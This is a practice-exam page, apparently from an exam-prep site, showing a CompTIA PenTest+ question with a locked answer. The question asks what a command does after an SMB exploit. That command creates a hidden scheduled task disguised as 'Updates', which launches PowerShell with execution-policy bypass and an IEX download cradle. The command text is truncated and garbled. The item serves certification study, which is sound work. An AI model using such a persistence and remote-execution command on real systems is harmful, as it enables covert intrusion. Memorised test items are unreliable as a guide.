nerdexam
CompTIA

PT0-003 · Question #254

A tester obtained access to a computer using a SMB exploit and now has a shell access into the target computer. The tester runs the following on the obtained shell: schtask /create /tn Updates /tr "C:

Sign in or unlock PT0-003 to reveal the answer and full explanation for question #254. The question stem and answer options stay visible for context.

Submitted by miguelv· Mar 6, 2026Post-exploitation and Lateral Movement

Question

A tester obtained access to a computer using a SMB exploit and now has a shell access into the target computer. The tester runs the following on the obtained shell:

schtask /create /tn Updates /tr "C:\windows\syswow64\Windows\WindowsPowershell\v1.0\powershell.exe hidden -NoLogo -NoInteractive -ep bypass -nop -c 'IEX ((new-object /ru System Which of the following does this action accomplish?

Options

  • AUpgrades the shell performing a privilege escalation activity
  • BUses the Windows Update service to move the shell connection and avoid detection
  • CMaintains access into the compromised computer
  • DForwards all the communication from the compromised host to the host 10.10.1.2

Unlock PT0-003 to see the answer

You've previewed enough free PT0-003 questions. Unlock PT0-003 for full answers, explanations, the timed quiz mode, progress tracking, and the master PDF. Question stem and options stay visible so you can still see what's on the exam.

Topics

#Persistence#Scheduled tasks#PowerShell#Post-exploitation
Full PT0-003 Practice